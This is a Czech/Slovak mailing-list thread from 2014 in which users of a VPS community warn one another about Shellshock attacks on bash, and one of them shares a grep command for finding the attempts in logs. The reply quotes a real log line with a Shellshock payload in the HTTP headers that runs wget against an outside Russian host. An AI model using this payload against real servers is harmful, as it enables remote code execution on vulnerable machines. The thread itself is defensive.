[vpsFree.cz: community-list] Útoky na bash běží
Pavol Hluchý
pavol.hluchy at gmail.com
Mon Sep 29 10:01:11 CEST 2014
ja som si nasiel (zatial len v ramci jedneho vhostu) asi 20 pokusov
(rozne url hlavne zacinajuce cgi-):
62.210.75.170 - - [28/Sep/2014:20:12:58 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 3071 "() { :; }; wget
http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "()
{ :; }; wget http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >>
/dev/null"
skusal som pre tu srandu stiahnut ten subor z creditstat.ru ze so do
toho pozrem ale uz to hlasi E404
On 09/29/2014 09:41 AM, Petr Krcmar wrote:
> Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu,
> podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit
> ho. Takže buďte ostražití a záplatujte si to.
>
> Pokud chcete vidět ty věci z logu, pak si grepněte:
>
> # grep '() {' /var/log/nginx/*
>
> Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
>
More information about the Community-list
mailing list